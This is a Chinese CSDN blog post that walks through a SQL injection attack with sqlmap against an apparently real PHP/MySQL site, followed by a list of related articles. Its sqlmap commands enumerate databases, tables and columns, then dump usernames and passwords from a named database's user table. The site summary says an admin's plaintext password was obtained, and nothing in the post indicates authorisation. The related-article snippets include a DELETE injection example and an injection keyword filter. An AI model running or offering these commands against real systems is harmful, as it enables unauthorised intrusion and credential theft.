实战:某网站的SQL注入(php+mysql+Apache)

最新推荐文章于 2024-02-23 11:00:00 发布
最新推荐文章于 2024-02-23 11:00:00 发布
阅读量881 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anlalu233/article/details/105739467
版权
本文介绍了如何使用sqlmap工具针对一个PHP+MySQL+Apache搭建的网站进行SQL注入攻击,详细步骤包括:列出所有数据库、特定数据库的表、表的字段以及数据,最后揭示了发现的一个admin账号的明文密码。
摘要由CSDN通过智能技术生成

1.列出所有数据库
sqlmap -u “http://www.aaa.com/a.php?id=2” --dbs
在这里插入图片描述

2.列出数据库"hailc0218"的所有表
sqlmap -u “http://www.aaa.com/a.php?id=2” --tables -D"hailc0218"
在这里插入图片描述

3.列出数据库"hailc0218"表“user”的所有字段
sqlmap -u “http://www.aaa/a.php?id=2” --columns -T"user" -D"hailc0218"
在这里插入图片描述

4.列出数据库"hailc0218"表“user”的前20个“id”,“name”和“password”的数据
sqlmap -u “http://www.aaa.com/a.php?id=2” --dump -C"password,name,id" -T"user" -D"hailc0218" --start 1 --stop 20

最低0.47元/天 解锁文章
anlalu233
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP:SQL 注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
10-09 534
PHP:SQL 注入
部署PHP+Apache+MySQL在Windows实战之例
那朵云
08-29 751
本来嘛,部署PHP没什么复杂,找各种版本着实头疼了一下。 官方下载地址: MySQL http://www.mysql.com/downloads/mysql/ 找个MSI文件下下来. Apache http://httpd.apache.org/download.cgi Php http://windows.php.net/download/#php-5.4
PHPSQL注入攻击
巅峰测试
08-03 1226
 SQL注入攻击是黑客攻击网站最常用的手段。如果你的站点没有使用严格的用户输入检验,那么常容易遭到SQL注入攻击SQL注入攻击通常通过给站点数据库提交不良的数据或查询语句来实现,很可能使数据库中的纪录遭到暴露,更改或被删除。下面来谈谈SQL注入攻击是如何实现的,又如何防范。 看这个例子:// supposed input$name = “ilia’; DELETE FROM users;
php网站sql注入修复方案,php 网站sql注入漏洞解决方案
weixin_35632257的博客
03-17 560
分享到:------解决方案--------------------你直接看下修复方案。------解决方案--------------------Fatal error: Call to undefined method NodeNav::GetCounter() in E:\www\ECMS\Template_c\[emailprotected][emailprotected]@list_...
PHP代码审计-sql注入
博客地址 www.sec0nd.top
10-24 1311
最近想学代码审计了,但是我本身的代码水平不高,学的比较基础,适合入门级别的朋友们阅读先学php的审计,后面再学java的吧(java只懂一点点)就不太多的赘述漏洞和代码的基础了,遇到不会的搜索其他人的文章就可以学会的入门我是看的代码审计相关的一些知识后面实战的代码也在这里可以下载的。
PHP+Tomact+MySQL蜂蜜动态网站搭建.rar
10-27
6. **注意事项**:在搭建过程中,需关注安全性问题,例如防止SQL注入攻击,对敏感数据进行加密,以及设置合理的权限控制。此外,优化数据库查询和代码性能也是提高网站效率的关键。 总之,PHP+Tomcat+MySQL的组合...
学生成绩管理系统PHP + MYSQL
09-06
**WAMP服务器** 是Windows环境下的一种集成环境,包含了Apache(Web服务器)、MySQL(数据库服务)和PHP(服务器端脚本语言)等组件,使得开发者能够在本地进行网站的开发和测试工作。WAMP提供了一个直观的用户界面...
php+mysql网站开发入门及提高
11-07
- **防止SQL注入**:使用预处理语句或参数化查询避免SQL注入攻击。 - **密码加密存储**:使用如bcrypt等算法对用户密码进行加密存储。 - **会话管理**:合理使用session管理用户的登录状态,确保安全性。 #### 四、...
PHPMySQL动态网站开发全程实例
11-07
学会使用预处理语句和事务处理,能有效防止SQL注入攻击,确保数据安全。 本书可能包含多个实例项目,这些项目可能涵盖用户注册登录系统、文章发布系统、评论功能、搜索功能等常见Web应用模块。通过这些实例,读者...
PHP+MySQL动态网站开发
12-14
此外,还会探讨PHP的表单处理,包括验证用户输入、防止SQL注入和XSS攻击等安全性问题。 文件名“php”可能指的是本书提供的源代码示例,这些示例涵盖了书中讲解的各种技术和应用场景。通过分析和运行这些代码,读者...
PHP+MysqlSQL注入源码 下载
02-11
PHP+MysqlSQL注入源码、下载解压部署到环境中去就行了。 PHP+MysqlSQL注入源码、下载解压部署到环境中去就行了。
一个PHPSQL注入完整过程
chenxin1017的博客
06-26 574
学了SQL注入的一些技能后,以下正对PHP+MYSQL进行SQL注入简单实践 首先观察两个MYSQL数据表 用户记录表: CREATE TABLE `php_user` ( `id` int(11) NOT NULL auto_increment, `username` varchar(20) NOT NULL default '', `password` v
php网站如何防止sql注入
php教程
11-11 2472
网站的运行安全肯定是每个站长必须考虑的问题,大家知道,大多数黑客攻击网站都是采用sql注入,这就是我们常说的为什么   ?      最原始的静态的网站反而是最安全的。今天我们讲讲PHP注入的安全规范,防止自己的网站sql注入。 如今主流的网站开发语言还是php,那我们就从php网站如何防止sql注入开始说起: Php注入的安全防范通过上面的过程,我们可以了解到php注入的原理和手法,当然
PHP防止SQL注入
战国墨竹的博客
06-12 900
我们在查询数据库时,出于安全考虑,需要过滤一些非法字符防止SQL恶意注入,请看一下函数: 复制代码代码如下: function injCheck($sql_str) { $check = preg_match('/select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile/', $sql_str); ...
043-WEB攻防-PHP应用&SQL注入&符号拼接&请求方法&HTTP头&JSON&编码类
最新发布
wushangyu32335的博客
02-23 1119
小迪安全2023笔记
php网站怎么导入sql数据库,php 简单数据库导入程序[.sql文件]
weixin_35639680的博客
03-12 225
function insert_file($file,$replace=''){global $Charset;$readfiles=read_file($file);if($replace){$readfiles=str_replace('$timestamp',"$timestamp",$readfiles);}$detail=explode("n",$readfiles);$count=co...
php网站注入,php+mysql注入页面实现
weixin_36300623的博客
04-16 283
最近在弄靶场,原本是打算找一些漏洞程序来做实验环境,但是去找这些程序感觉太麻烦了,几段代码能实现的东西还是自己写吧。首先来借鉴一下注入点,以往的注入点是这样的http://www.xxx.com/show.php?id=1,典型的数字型注入。$id=$_GET['id'];//获取GET方式传过来的值并赋值给变量既然是注入那么肯定要操作数据库。$con = mysql_connect('127.0...
php开发的网站sql注入,php – ADOdb中的SQL注入和一般网站安全性
weixin_39622150的博客
03-17 132
我已经做了很多阅读,但仍然不理解100%SQL注入的发生方式!我想从那些知道基于我的例子的SQL注入的具体例子中看到它,因此它可以被复制,测试和修复.我试过SQL注入我的代码而不能,所以我希望有人来证明我的意思!1.我认为SQL注入只能通过POST或GET方法进行,这意味着在网站上它应该是帖子形式,例如’注册或搜索’或查询’search.php?tags = love’?说这可以注入以下具有POS...
构建个人博客系统PHP+MySQL实战教程
9. **系统安全与维护**:学习如何确保博客系统的安全性,例如数据加密、防止SQL注入、XSS攻击防护等,以及如何定期备份和更新系统,保持其稳定运行。 通过本教程的学习,读者不仅能够掌握PHPMySQL的实用技能,还...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值